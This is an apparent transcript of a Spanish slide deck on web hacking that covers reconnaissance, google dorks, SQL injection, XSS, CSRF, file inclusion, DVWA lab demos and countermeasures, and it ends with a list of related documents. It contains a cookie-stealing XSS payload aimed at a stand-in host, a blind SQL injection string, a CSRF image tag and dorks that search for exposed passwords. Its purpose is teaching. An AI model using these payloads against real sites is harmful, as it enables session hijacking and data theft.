Taller de Hacking Web

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Taller de Hacking Web"

Transcripción

1 Taller de Hacking Web

2 Quién soy yo? Soy experto en seguridad informá?ca desarrollando en los úl?mos 4 años mi labor como pentester en diferentes proyectos de hacking é?co para grandes empresas e ins?tuciones, colaborador del programa Mundo Hacker, escritor de diferentes libros relacionados con la seguridad informá?ca y el hacking é?co, formador de los cuerpos y seguridad del gobierno Español y sobre todo apasionado por la seguridad informá?ca y sus aplicaciones en el mundo actual.

3 Introducción Qué son los ataques a las aplicaciones web? Consiste en introducir código del lado front- end o back- end, con el fin de comprometer la aplicación. Qué?po de repercusión pueden llegar a tener? Dependiendo del?po de ataque realizado, es posible causar mayor o menor grado de repercusión. Y donde queda la seguridad? La seguridad la?ene que a portar el desarrollador. Existen medidas que automa?zan la seguridad? A día de hoy hay diferentes productos que protejen las aplicaciones web.

4 Ciberataques Son todos aquellos ataques que se realizan contra sistemas informá?cos cuya finalidad puede ser los siguientes puntos: Tomar el control del sistema. Denegación del servicio. U?lizar el sistema infectado como pasarela para realizar ataques. Robo de credenciales. Espionaje. Destrucción del sistema informá?co.

5 Ciberataques Mapas web donde se pueden visualizar ataques en el pasado y en el presente: hzp://globe.cyberfeed.net/ hzp://atlas.arbor.net/worldmap/index hzp://cybermap.kaspersky.com/ hzp://sicherheitstacho.eu/ hzp://map.ipviking.com/ hzp://www.akamai.com/html/technology/dataviz1.html hzp://globe.f- secure.com/ hzp://www.team- cymru.org/monitoring/malevolence/maps.html hzp://www.digitalazackmap.com/ hzp://www.shadowserver.org/wiki/pmwiki.php/stats/ddosmaps hzp://map.honeycloud.net/

6 Ciberataques Estadís?ca de ataques web por la empresa WhiteHat Security.

7 Ciberseguridad El gráfico siguiente con?ene gran parte de las organizaciones que han sido víc?mas de ataques web: Vic$mas Gobiernos 20% Finanzas 10% Venta al por Menor 5% Entretenimiento 5% Polí?co 20% Poveedor de Servicio 10% Educación 5% Hospitales 5% Servicios de Información 10% Hos?ng 10%

8 Ciberseguridad A con?nuación se listan las posibles repercusiones que podría hacer contra la organización (empresa o ins?tución pública): Robo de Información y a demás venta de información confidencial a la competencia. Manipulación malintencionado con el perfil de un usuario de la organización. Espionaje. Defacement de la aplicación web. Denegación de Servicio contra la base de datos. Denegación de Servicio contra el servidor web. Acceso completo al servidor de la organización mediante la aplicación web. Crear un RootServer una vez está comprome?do el servidor.

9 Dinero

10 Diferencia entre Pentester y Cibercriminal A par?r de aquí podemos diferenciar entre un cibercriminal y un pentester. Auditor o pentester: buscara los agujeros de seguridad con el fin de proteger. Cibercriminal: buscara también los agujeros pero con fines destruc?vos.

11 Etapas de un ataque web Reconocimiento: consiste en obtener información publica mediante medios pasivos o medios ac?vos: Medios Pasivos: hacking con buscadores, herramientas de indagación en redes sociales, análisis de metadatos, herramientas de ges?ón de red, etc. Medios Ac?vos: mediante técnicas de ingeniería social aplicadas a las personas que ges?onen la aplicación web o puedan tener algún?po de contacto con la misma. Enumeración: consiste en escanear la red obje?vo para obtener la mayor información posible sobre toda la arquitectura.

12 Etapas de un ataque web Análisis: consiste en buscar todas las posibles vulnerabilidades en los disposi?vos encontrados en las fases anteriores. Explotación: consiste en explotar las vulnerabilidades encontradas en la etapa anterior, con el obje?vo de poder perpetrar y eliminar falsos posi?vos.

13 Etapas de un ataque Desde el punto de vista del pentester: Documentación: etapa final del proceso de pentes?ng donde se describe el pentest realizado en un documento de cara a que luego pueda volverse a reproducir. Desde el punto de vista del cibercriminal: Borrado de huellas: eliminación de cualquier?po de rastro que hubiera podido dejar en el sistema.

14 El empiece de un atacante Los ataques a las aplicaciones web, empiezan primero aplicando técnicas de fingerprin?ng y footprin?ng.

15 Recabar Información Fingerprin?ng: todas aquellas técnicas que nos permitan obtener información sobre el?po de sistema, los servicios que corren, la versión de los servicios etc. Footprin?ng: toda aquella información que aparece de forma pública.

16 Nmap Nmap es la herramienta por excelencia u?lizada por todo el mundo que quiera recabar información sobre que con?ene el sistema. No solo permite iden?ficar puertos y servicios. Dispone de una gran variedad de scripts de los cuales algunos de ellos?enen repercusión contra las aplicaciones web

17 Scripts Nmap

18 NETCAT Herramienta u?lizada con diferentes propósitos, uno de ellos es la u?lización de la técnica Banner Grabing. Banner Grabing consiste en obtener la versión de las aplicaciones. El obje?vo de netcat contra las aplicaciones web es obtener la e?queta server que es donde se almacena información.

19 Resultado NETCAT

20 HTTPrint Herramienta que automa?za las técnicas de fingerprin?ng, permite iden?ficar el?po de servidor web, la tecnología u?lizad incluso cuando hay un WAF de por medio.

21 Hacking con buscadores La u?lización de los buscadores es otra forma pasiva para recopilar información. Es posible encontrar información de carácter muy importante para las aplicaciones web, haciendo simplemente uso de los buscadores como google, bing etc. Mediante el uso de determinadas expresiones dentro del buscador podemos u?lizando la araña de google por ejemplo, encontrar ficheros de tarjetas de crédito.

22 Operadores u?lizados en google hacking Site: restringe la búsqueda solo a la página o dominio. In?tle: busca la cadena introducida en los ltulos de las páginas. Inurl: busca por páginas que contengan en la url la cadena introducida. Intext: la cadena de texto introducida deberá aparecer en el interior de las páginas. Filetype: acota la búsqueda a las páginas que contengan la extensión puesta como cadena en el filetype.

23 Ejemplos de google hacking Inurl:ws_np.ini [ WS_FTP] filetype.ini Inurl:midicart.mdb ext:cgi inurl:cgi- bin intext:#!/bin/bash Inurl:admin.php Filetype:sql in?tle: index of Index of / password.txt Filetype:inc intext:mysql_connect password please could port

24 Herramientas google Hacking Google Hacks. Search Diggity. Goodork. SQLmap

25 Búsqueda de Vulnerabilidades Existen herramientas que permiten automa?zar la búsqueda de vulnerabilidades a la hora de realizar un hacking web. Algunas de las herramientas: Arachni. Acune?x. BurpSuite. AppScan. Nessus. W3af. Grabber. Vega. Skipfish.

26 Explotación de la vulnerabilidad Herramientas u?lizadas para explotar las vulnerabilidades encontradas: Sqlmap. Havij. SqlNinja. SQLBrute BSQL Hacker. Absinthe. Metasploit. DarkMYSQLI.

27 Entendiendo los vectores Existen diferentes formas para llegar a tener el vector de ataque: Auditoría de caja blanca: disponemos de bastante información del entorno por lo que a la hora de fijar el vector viene prác?camente acotado. Auditoría de caja negra: hay veces que se dispone de más información y otras veces que menos, pero de igual manera es más trabajoso encontrar los vectores de ataque. Auditoría de caja gris: es una mezcla entre caja blanca y caja negra. Desde el punto de vista del cibercrimen puede haber un obje?vo fijado o bien simplemente un juego de azar.

28 Obje?vos de un ataque web Evadir las medidas de seguridad existentes para conseguir extraer información de carácter sensible. Provocar un ataque de denegación se servicio que impida el acceso a la aplicación web. Probar a desarrollar nuevos agujeros de seguridad conocidos como 0 days que permitan explotar la aplicación web.

29 Metodologías Hacking Web OWASP: Es una organización sin ánimo de lucro orientada a desarrollar proyectos de código abierto para mejorar la seguridad informá?ca. NIST: Se trata del Na?onal Ins?tute Of Standards and Technology perteneciente al Departamento de Comercio de los Estados Unidos. OSSTMM: Se corresponde con una metodología abierta desarrollada por ISECOM, en la que se indican las pautas para comprobar la seguridad informá?ca.

30 Más información de Ataques En la página de owasp podemos ver de forma categorizada cada vulnerabilidad que se puede aplicar en aplicaciones web: hzps://www.owasp.org/index.php/category:azack

31 Top 10 de Vulnerabilidades OWASP

32 Tipos de Ataques SQL Injec?on. Blind Sql Injec?on XSS Reflected. XSS Stored. CSRF. Brute Force LFI/RFI. Command Execu?on File Upload

33 Otras Vulnerabilidades Web Xml Injec?on. Denial of Service. Ajax Injec?on. Xpath Injec?on. Buffer Overflow. Path Traversal LDAP Injec?on. Reflected DOM Injec?on. Cross Site Tracing. Session Fixa?on.

34 SQL Injec?on SQL Injec?on Fallo de inyección. Falta de validación de entradas. Permite modificar las consultas SQL. Extracción de información.

35 SQL Injec?on Ejemplo sin sql injec?on: h*p://example.com/news.php?id=23 <?php //... $id = $_GET['id']; $query = SELECT * FROM news WHERE id=$id ; //...?> SELECT * FROM news WHERE id=23

36 SQL Injec?on Ejemplo con Sql Injec$on h*p://example.com/news.php?id=23 and1=0 <?php //... $id = $_GET['id']; $query = SELECT * FROM news WHERE id=$id ; //...?> SELECT * FROM news WHERE id=23 and 1=0

37 SQL Injec?on

38 Diferencia entre sql injec?on y blind sql Injec?on

39 Diferencia entre sql injec?on y blind sql Injec?on No muestra información de la base de datos en el navegador. Se necesita booleanizar la información. Extracción de datos más lenta.

40 Ejemplo Blind Sql Injec?on Selecciona al menos un registro de la tabla usuarios. No selecciona ningún registro de la tabla usuarios.

41 Ejemplo Blind Sql Injec?on 1 = 1? 1 = 0?

42 Booleanización Representar la información de forma binaria. Extraer un bit de información en cada consulta.

43 Búsqueda Binaria Buscar un valor en un arreglo ordenado. Reduce la complejidad a la mitad en cada iteración. Muy eficiente.

44 Algoritmo de Búsqueda Binaria

45 Por ejemplo:?user=admin' AND ASCII(MID(USER(),1,1))>128%23 ASCII( 'r' ) - - > 114 AND 114 > > FALSO?user=admin' AND ASCII(MID(USER(),1,1))>64%23... ASCII( 'r' ) - - > 114 AND 114 > > VERDADERO

46 SQL Injec?on

47 SQL Injec?on hzp://www.sqlinjec?onwiki.com/

48 SQL Injec?on Demo SQL Injec?on en DVWA:

49 XSS Su nombre original es "Cross Site Scripting", y es abreviado como XSS para no ser confundido con las siglas CSS, (hojas de estilo en cascada). Las vulnerabilidades de XSS originalmente abarcaban cualquier ataque que permitiera ejecutar código de "scripting", como VBScript o JavaScript, en el contexto de otro sitio web.

50 XSS Las fallas XSS ocurren cada vez que una aplicación toma datos no confiables y los envía al navegador web sin una validación y codificación apropiada. XSS permite a los atacantes ejecutar secuencia de comandos en el navegador de la victima los cuales pueden secuestrar las sesiones de usuario, destruir sitios web, o dirigir al usuario hacia un sitio malicioso.

51 XSS REFLECTED Los ataques reflejados son aquellos donde el código inyectado es reflejado fuera del servidor, tal como en un mensaje de error, el resultado de una búsqueda o cualquier otra respuesta que incluya una parte de la entrada enviada al servidor como parte de una solicitud.

52 XSS REFLECTED

53 XSS STORED Los ataques almacenados son aquellos en los que el código inyectado reside permanentemente en los servidores que lo envían, ya sea en la base de datos, en un mensaje de un foro, en un log de un visitante, campo de comentario, etc. La víctima descarga el script malicioso del servidor cuando hace alguna solicitud de contenido

54 XSS STORED

55 Ejemplo XSS Considere el siguiente formulario: <form ac?on="/registrar.php" method="post"> <p>nombre de usuario: <input type="text" name="reg_usuario" /></p> <p> <input type="text" name="reg_ " /></p> <p><input type="submit" value="registrar" /> </form>

56 Ejemplo XSS Ahora considere el siguiente script de inserción de los datos: if (!get_magic_quotes_gpc()) { } $_POST['reg_usuario'] = addslashes($_post['reg_usuario']); $_POST['reg_ '] = addslashes($_post['reg_ ']); $sql = "insert into users (username, ) values ('{$_POST['reg_usuario ']}', '{$_POST['reg_ ']}')";

57 Ejemplo XSS Imagine el siguiente nombre de usuario: <script>alert(' Oh no!');</script> Se puede determinar fácilmente que el código anterior no es nombre de usuario válido, lo cual demuestra que el código que escribimos no es siempre prudente. Por supuesto, el peligro de XSS reside en el efecto producido cuando los datos son reenviados a otros u?lizadores.

58 Ejemplo XSS Despligue por un administrador: <table> <tr> <th>usuario</th> <th> </th> </tr> <?php if ($_SESSION['admin']) { $sql = 'select username, from users'; $result = mysql_query($sql); while ($user = mysql_fetch_assoc($result)) { echo "\t<tr>\n"; echo "\t\t<td>{$user['username']}</td>\n"; echo "\t\t<td>{$user[' ']}</td>\n"; echo "\t</tr>\n"; } }?> </table>

59 Ejemplo XSS En el ejemplo anterior si los datos no son validados antes de ser guardados, el administrador podrá ser sujeto de un ataque XSS.

60 Ejemplo XSS El riesgo es aún más evidente con algún ataque más vicioso como el siguiente: <script> document.loca?on = 'hzp://maligno.ejemplo.org/roba_cookies.php? cookies=' + document.cookie </script> En este ejemplo, el script distante roba_cookies.php puede acceder a los cookies con la variable $_GET['cookies']. Un vez capturados los cookies pueden ser u?lizados para lanzar ataques de usurpación de iden?dad, obtener datos sensibles, etc.

61 Demo XSS en DVWA: XSS

62 CSRF Este?po de ataques en lugar de explotar la confianza del usuario explotan la confianza que hace el si?o web a sus usuarios. CSRF implica la simulación de solicitudes HTTP, por lo cual es muy importante entender las solicitudes HTTP.

63 CSRF Considere un foro hipoté?co en hzp://foro.ejemplo.org/ que u?liza el siguiente formulario: <form ac?on="/add_post.php"> <p>asunto: <input type="text" name="post_subject" /></p> <p>mensaje: <textarea name="post_message"></ textarea></p> <p><input type="submit" value="enviar" /></p> </form>

64 CSRF Dado que en el código anterior no se indicó POST una solicitud GET es enviada: GET /add_post.php?post_subject=foo&post_message=bar HTTP/1.1 HOST: foro.ejemplo.org Cookie: PHPSESSID=

65 CSRF Considere la e?queta <img> siguiente: <img src="hzp://foro.ejemplo.org/add_post.php? post_subject=foo&post_message=bar /> Cuando un navegador pida esta imagen va a enviar exactamente la misma solicitud de la filmina anterior. La víc?ma va a enviar un mensaje en el foro y sin darse cuenta.

66 Demo CSRF en DVWA: CSRF

67 Brute Force Un ataque de fuerza bruta es un método que se usa para adivinar las credenciales del sistema mediante la automa?zación de la prueba de credenciales. Este ataque es conocido como cracking online debido a que ataca a un servicio cuya arquitectura es Cliente/Servidor. Llevado al ámbito del hacking web este ataque repercu?rá en todas la aplicaciones donde exista un panel de login. El Obje?vo de este ataque es sacar las credenciales de la plataforma.

68 Demo Brute Force en DVWA: Brute Force

69 LFI Es utilizada en sitios que permiten el enlace de archivos locales, debido a una mala verificación en la programación de la página, que contiene las funciones propias de PHP: include(), include_once(), requiere(), requiere_once(). Solo existe en páginas dinámicas desarrolladas en PHP.

70 Demo LFI en DVWA: LFI

71 RFI Es utilizada en sitios que permiten el enlace de archivos remotos, debido a una mala verificación en la programación de la página, que contiene las funciones propias de PHP: include(), include_once(), requiere(), requiere_once(). Solo existe en páginas dinámicas desarrolladas en PHP.

72 Demo RFI en DVWA: RFI

73 Command Execu?on Permite la ejecución de determinados comandos en el sistema. Esta vulnerabilidad permi?rá modificar, eliminar archivos y directorios del servidor, las posibilidades son infinitas, su única limitación es el usuario que usa la consola para ejecutar los comandos, así dependería de los permisos de ese usuario para realizar ciertas acciones.

74 Command Execu?on Demo Command Execu?on en DVWA:

75 File Upload Consiste en subir al sistema un fichero malicioso ya sea sin aplicar ninguna técnica de camuflamiento o bien camuflando el malware dentro de uno los ficheros considerados por el sistema como aceptable. Algunas técnicas aplicadas para camuflar el malware son: Null Byte. Introducción a través de metadatos. Modificación de las cabeceras del fichero. Modificación de la Extensión.

76 Demo File Upload en DVWA: File Upload

77 Expresiones regulares. Validación de?po. Escapar caracteres Especiales. Librerías de seguridad. ESAPI. No solo JavaScript. Medidas de Protección Contra Sql Injec?on

78 Consultas Parametrizadas: Definir primero la Medidas de Protección consulta y luego pasarle los parámetros. Prepared Statements. Storage Procedures Contra Sql Injec?on

79 Permisos de Acceso: Las aplicaciones no necesitan la cuenta de Administrador. GRANT ALL PRIV... Es Necesario? Aplicaciones diferentes, usuarios diferentes Medidas de Protección Contra Sql Injec?on

80 Medidas de Protección contra XSS XSS: HTMLfilter es un proyecto para PHP que analiza todos los datos HTTP antes de ser u?lizados. Filtrar todos los datos foráneos. U?lizar la funcionalidad existente: htmlen??es(), strip_tags, u 8_decode(), etc. pueden ayudar a escribir la lógica de filtrado. Solamente autorizar un contenido validado. U?lizar una convención de nombres descrip?va.

81 Medidas de Protección contra CSRF U?lizar el método POST en los formularios. U?lizar el arreglo $_POST en lugar de las variables creadas gracias a register_globals. No simplificar las acciones importantes. Obligar al usuario a u?lizar nuestros formularios HTML.

82 Medidas de Protección contra CSRF Un ejemplo de técnica para obligar al usuario a u?lizar nuestros propios formularios es la siguiente: <?php $token = md5(?me()); $_SESSION['token'] = $token; $_SESSION['token_?mestamp'] =?me();?> <form ac?on="/add_post.php"> <input type="hidden" name="token" value="<?php echo $token;?>" /> <p>asunto: <input type="text" name="post_subject" /></p> <p>mensaje: <textarea name="post_message"></textarea></p> <p><input type="submit" value="enviar" /></p> </form>

83 Medidas de Protección contra Brute Force U?lización de captchas. Medidas de baneo llegado a los x intentos de error. U?lización de contraseñas robustas. U?lización de herramientas que permiten proteger a los paneles web frente a estos ataques, por ejemplo la herramienta cphulk Brute Force Protec?on.

84 Medidas de Protección contra LFI Como contramedida podemos recomendar los siguientes items: Filtrar todos los parámetros que un usuario de la página pueda manejar. Asegurarse de que no se pueda acceder a archivos más allá del "Document Root" de la página. Procesamiento correcto del parámetro y de la función que se dedique a recuperar el contenido del fichero que necesitemos.

85 Medidas de Protección contra RFI Como contramedida podemos recomendar los siguientes items: Filtrar todos los parámetros que un usuario de la página pueda manejar. Procesamiento correcto del parámetro y de la función que se dedique a recuperar el contenido del fichero que necesitemos. Si es posible setear la variable de PHP allow_url_fopen en off

86 Medidas de Protección contra Command Execu?on No permi?r la inserción de comandos como && o. Filtrar el campo de tal manera que solo permita la introducción del comando esperado. Aplicar comprobaciones sobre el campo, determinando el?po de datos que se le pasarán a los parámetros que recibe el comando.

87 Otras Medidas de Protección Sistemas de detección y prevención de intrusos. (Snort, PHPIDS) Web Applica?on Firewall. (mod_security) Reescritura de solicitudes HTTP. (mod_rewrite) Basados en patrones. No 100% confiables.

88 Entornos de Explotación Existen diferentes entornos de explotación web, a con?nuación se listan algunos de ellos: DVWA. NOWASP Mu?llidae. SQLI- LABS. Metasploitable. WebGoat. bwapp. PentesterLab.

89 Taller de Hacking Tecnologías u?lizadas: Programación del lado Cliente: JavaScript. Programación del lado Servidor: PHPy JSP. Sistema gestor de base de datos: MongoDB y Sql Server. Ataques que se realizarán: Blind NoSQL Injec?on del?po boolean. hzp Parameter Pollu?on. Blind Sql Injec?on?me based. Hooking XSS Stored.

90 Qué es MongoDB? MongoDB es un sistema de bases de datos NoSQL orientada a documentos, desarrollado bajo el concepto de código abierto. En lugar de guardar los datos en tablas como se hace en las bases de datos relacionales, MongoDB guarda estructuras de datos en documentos?po JSON con un esquema dinámico. No cumple con el esquema en?dad- relación. No impone una estructura de datos.

91 CRUD Create db.collec?on.insert( <document> ) db.collec?on.save( <document> ) db.collec?on.update( <query>, <update>, { upsert: true } ) Read db.collec?on.find( <query>, <projec?on> ) db.collec?on.findone( <query>, <projec?on> ) Update db.collec?on.update( <query>, <update>, <op?ons> ) Delete db.collec?on.remove( <query>, <justone> )

92 NoSql

93 Por qué surge? Poca eficiencia en aplicaciones en las BD relacionales. Aumento de operaciones de lectura y escritura. Gran conjunto de transacciones. Sentencias complejas. Dificultades en las escalabilidad del sistema.

94 Caracterís?cas NoSQL Consistencia Eventual. Ausencia de esquema en los registros de datos. Alta velocidad de respuesta a pe?ciones. Estructura distribuida. Escalabilidad horizontal.

95 Sistemas en Producción que usan MongoDB

96 Web Services Tecnología u?lizada para intercambiar datos entre aplicaciones. Dis?ntas aplicaciones y entornos puede hacer uso de los web services para intercambiar información y procesarla. SOAP: Protocolo sobre el que se estable el intercambio. WSDL: Es el lenguaje de la interfaz pública para los servicios Web. Es una descripción basada en XML de los requisitos funcionales necesarios para establecer una comunicación con los servicios Web.

97 HTTP Parameter Pollu?on Los ataques de polucción de parámetros HTTP consisten en la inyección de delimitadores query string codificados en otros parámetros existentes. Si el parámetro en el que se ha realizado la inyección no es valida correctamente y se u?liza decodificado para generar una URL, el atacante puede insertar uno o más parámetros en dicha URL. Las consecuencias de este ataque dependen de la lógica de la aplicación y pueden tener desde un leve impacto hasta una gran importancia.

98 HTTP Parameter Pollu?on Dependiendo del lenguaje del servidor si se aplica el ataque HPP se cogerá el primero, el segundo o ambos parámetros repe?dos.

99 Beef Herramienta desarrollada en JavaScript es open- source. Permite mediante JavaScript infectar los navegadores y u?lizando una gran variedad de scripts ejecutar diferentes ataques en función del?po de navegador que se haya infectado. Beef es una librería de JavaScript como por ejemplo la librería jquery, que se incluye en una página y esta se distribuye para infectar los navegadores.

100 Taller de Hacking

101 Taller Hacking web

Optimización de Inyecciones SQL

Optimización de Inyecciones SQL Optimización de Inyecciones SQL Cesar Neira Estudiante de Ing. de Sistemas UNMSM http://alguienenlafisi.blogspot.com csar.1603@gmail.com OWASP LATAM TOUR 2012 The OWASP Foundation http://www.owasp.org

Más detalles

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com

Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com Seminario de SEGURIDAD WEB Pedro Villena Fernández www.consultoriainnova.com Algunas cosas antes de empezar... Este seminario NO tiene la intención de piratear otras webs. Los ataques que aprenderemos

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web

Más detalles

Índice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad.

Índice. 1. Introducción al XSS. 2. Taller Práctico Explotando la Vulnerabilidad. 3. Robo de cookies Uso de estas. 4. Arreglando la vulnerabilidad. Índice 1. Introducción al XSS. Qué es el XSS? Por qué se produce? Tipos de XSS 2. Taller Práctico Explotando la Vulnerabilidad. XSS Reflejado XSS Persistente 3. Robo de cookies Uso de estas. Como robar

Más detalles

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE

POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE 1 Obje%vo El asistente aprenderá los conceptos básicos sobre los

Más detalles

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security

Más detalles

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes

Más detalles

Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals

Desarrollo de Código Seguro. Seguridad en PHP. Introducción. Register Globals Desarrollo de Código Seguro 22 y 27 de Septiembre de 2004 Facultad Regional Concepción del Uruguay Universidad Tecnológica Nacional Gabriel Arellano arellanog@frcu.utn.edu.ar Seguridad en PHP Lineamientos

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales

Más detalles

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014 Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador

Más detalles

La inmensa mayoría de las páginas son vulnerables, a unos u otros fallos.

La inmensa mayoría de las páginas son vulnerables, a unos u otros fallos. Introducción a la seguridad Web: La inmensa mayoría de las páginas son vulnerables, a unos u otros fallos. El gran problema no está en que esas páginas sean vulnerables y con ello podamos pasar un rato

Más detalles

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian)

Quienes somos. Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) CON Quienes somos Eduardo Arriols (@_Hykeos) Roberto Lopez (@leurian) Estudiantes de Ing. Informática en la EPS de la UAM y apasionados del mundo de la seguridad informática y el hacking. Fundadores del

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento Ataques más comunes Virginia Armas Alejandro Do Nascimiento 1 Introducción Los ataques a desarrollar en la exposición son: HTTP Tunneling Suplantación de contenido Local File Inclusion Remote File Inclusion

Más detalles

Introducción a ataques de tipo inyección: Inyección SQL

Introducción a ataques de tipo inyección: Inyección SQL Introducción a ataques de tipo inyección: Inyección SQL Jorge Peris Cortés - jorpecor@alumni.uv.es Asignatura: Redes Ingeniería Informática - Curso 2011/2012 Universidad de Valencia 1 Índice INTRODUCCIÓN...

Más detalles

S E G U R I D A D E N A P L I C A C I O N E S W E B

S E G U R I D A D E N A P L I C A C I O N E S W E B H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,

Más detalles

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1

Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1 Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación

Más detalles

A1-Inyección (SQL,OS Y LDPA)

A1-Inyección (SQL,OS Y LDPA) Los Diez Riesgos Más Importantes en Aplicaciones WEB Top 10-2010 A1-Inyección (SQL,OS Y LDPA) Oscar William Monsalve Luis Alberto Suarez Jorge Eliecer Betancur Diana Marcela Usuga G. Contenido Presentación

Más detalles

Hacking ético y Seguridad en Red

Hacking ético y Seguridad en Red TFC: Administración de Redes y Sistemas Operativos Hacking ético y Seguridad en Red Alumno: Cristiano Dias Consultor: José Manuel Castillo Pedrosa 1 Índice Introducción... 3 Perfil del Hacker ético...

Más detalles

Índice: Tema 4.2 4.2 Conexión con Bases de Datos

Índice: Tema 4.2 4.2 Conexión con Bases de Datos Índice: Tema 4.2 4.2 Conexión con Bases de Datos 4.2.1 Envío y recepción de datos mediante formularios 4.2.2 Administración de MySQL con phpmyadmin 4.2.3 Conexión con Bases de Datos desde PHP Índice: Tema

Más detalles

DOCS. Pautas básicas para el DESARROLLO DE PLUGINS

